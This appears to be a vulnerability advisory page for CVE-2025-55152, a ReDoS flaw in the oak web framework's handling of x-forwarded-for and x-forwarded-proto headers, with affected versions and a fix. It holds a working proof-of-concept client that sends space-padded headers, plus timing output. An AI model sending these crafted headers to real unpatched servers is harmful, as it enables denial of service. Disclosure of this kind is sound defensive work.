CVE-2025-55152: oak: ReDoS in x-forwarded-proto and x-forwarded-for headers

Published Aug 9, 2025
·
Updated

Summary

With specially crafted value of the x-forwarded-proto or x-forwarded-for headers, it's possible to significantly slow down an oak server.

Vulnerable Code

- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87 - https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142

PoC

- setup deno --version deno 2.4.3 v8 13.7.152.14-rusty typescript 5.8.3

- server.ts ts import { Application } from "https://deno.land/x/oak/mod.ts";

const app = new Application({proxy: true});

let i = 1

app.use((ctx) => {

// let url = ctx.request.url // test1) x-forwarded-proto let ips = ctx.request.ips // test2) x-forwarded-for console.log(request ${i} received) i++; ctx.response.body = "hello"; });

await app.listen({ port: 8080 });

- client.ts ts const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000]

const data1 = lengths.map(l => 'A' + 'A'.repeat(l) + 'A'); const data2 = lengths.map(l => 'A' + ' '.repeat(l) + 'A');

async function run(data) { for (let i = 0; i < data.length; i++) { let d = data[i]; const start = performance.now();

await fetch("http://localhost:8080", { headers: { // "x-forwarded-proto": d, // test1) "x-forwarded-for": d, // test2) }, });

const end = performance.now(); console.log('length=%d, time=%d ms', d.length, end - start); } }

console.log("\n[+] Test normal behavior") await run(data1) console.log("\n[+] Test payloads") await run(data2)

- run deno run --allow-net server.ts deno run --allow-net client.ts

[+] Test normal behavior length=2002, time=14 ms length=4002, time=6 ms length=8002, time=3 ms length=16002, time=3 ms length=32002, time=2 ms length=64002, time=4 ms length=128002, time=3 ms

[+] Test payloads length=2002, time=7 ms length=4002, time=22 ms length=8002, time=77 ms length=16002, time=241 ms length=32002, time=947 ms length=64002, time=4020 ms length=128002, time=15840 ms

Impact

A specially crafted value of the x-forwarded-proto or x-forwarded-for headers  can be used to significantly slow down an oak server.

Similar Issues

- https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6 - https://github.com/denoland/deno/pull/17722 - https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693 - https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff

Other sources

oak is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it's possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers.

— MITRE

Affected Software

2 affected components
Deno oak<=17.1.5
npm/@oakserver/oak<=14.1.0

Event History

Aug 9, 2025
CVE Published
via MITRE·01:29 AM
Data Sourced
via MITRE·01:29 AM
DescriptionSeverityWeakness
Data Sourced
via NVD·02:15 AM
DescriptionSeverityWeakness
Aug 12, 2025
Advisory Published
via GitHub·12:15 AM
Data Sourced
via GitHub·12:15 AM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2025-55152?

The severity of CVE-2025-55152 is considered high due to its potential to significantly slow down an oak server.

2

How do I fix CVE-2025-55152?

To fix CVE-2025-55152, upgrade to oak version 17.1.6 or later.

3

What versions of oak are affected by CVE-2025-55152?

CVE-2025-55152 affects oak versions 17.1.5 and below.

4

What type of attack is associated with CVE-2025-55152?

CVE-2025-55152 is associated with denial-of-service attacks that can slow down oak servers.

5

Where can I find more information about CVE-2025-55152?

Additional information about CVE-2025-55152 can be found in the oak project security advisories.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203